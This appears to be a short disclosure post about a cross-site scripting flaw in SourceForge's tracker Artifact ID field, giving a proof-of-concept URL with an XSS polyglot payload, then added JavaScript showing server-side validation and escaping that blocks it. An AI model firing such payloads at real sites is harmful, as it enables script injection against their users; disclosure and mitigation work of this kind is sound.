
SourceForge.net vulnerable to cross-site scripting (XSS)

A grey hat hacker known as "Sony" has discovered a cross-site scripting vulnerability in the SourceForge.net website. SourceForge is one of the best websites, hosting some of the best open source projects such as 7zip, ophcrack and our HashcodeCracker project.

The Artifact ID field on the Feature Requests tracker page is vulnerable to an XSS attack. The hacker said this is not a critical bug.

PoC:
http://sourceforge.net/tracker/?limit=25&func=&group_id=551517&atid=2238316&assignee=&status=&category=&artgroup=&keyword=&submitter=&artifact_id=\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\&assignee=&status=&category=&artgroup=&submitter=&keyword=&artifact_id=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&submit=Filter 
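
One way to close this class of bug on the server side, added here as an example (it is not SourceForge's code and not part of the original post). It assumes `artifact_id` is meant to be a numeric ID; the function names and sample inputs are hypothetical and constructed for illustration.

```javascript
// Added example. Assumption: artifact_id is meant to be a numeric ID.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Strict allow-list parse of the filter field.
// Returns { valid: true, id: number|null } (null = no filter set),
// or { valid: false } for anything that is not a single run of digits.
function parseArtifactId(queryString) {
  const values = new URLSearchParams(queryString)
    .getAll('artifact_id')
    .filter((v) => v !== '');
  if (values.length === 0) return { valid: true, id: null };
  // A repeated parameter is ambiguous: different layers may pick different copies.
  if (values.length > 1) return { valid: false };
  if (!/^[0-9]{1,10}$/.test(values[0])) return { valid: false };
  return { valid: true, id: Number(values[0]) };
}

// Encode for HTML text and quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Encode as a double-quoted JavaScript string literal for an inline <script> block.
// JSON.stringify handles quotes, backslashes and control characters; the extra
// pass removes characters that could close the script element or the line.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// Constructed sample inputs (not taken from a real request log).
const SAMPLE_PAYLOAD = "';alert(1)//</SCRIPT>";
const SAMPLE_QUERY = 'limit=25&artifact_id=' + encodeURIComponent(SAMPLE_PAYLOAD);

console.log(parseArtifactId('limit=25&artifact_id=12345'));
console.log(parseArtifactId(SAMPLE_QUERY));
console.log(escapeHtml(SAMPLE_PAYLOAD));
console.log(jsStringLiteral(SAMPLE_PAYLOAD));
```

Validation rejects the request before anything is rendered; the two encoders cover the places where a request value still has to be echoed back into the page.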

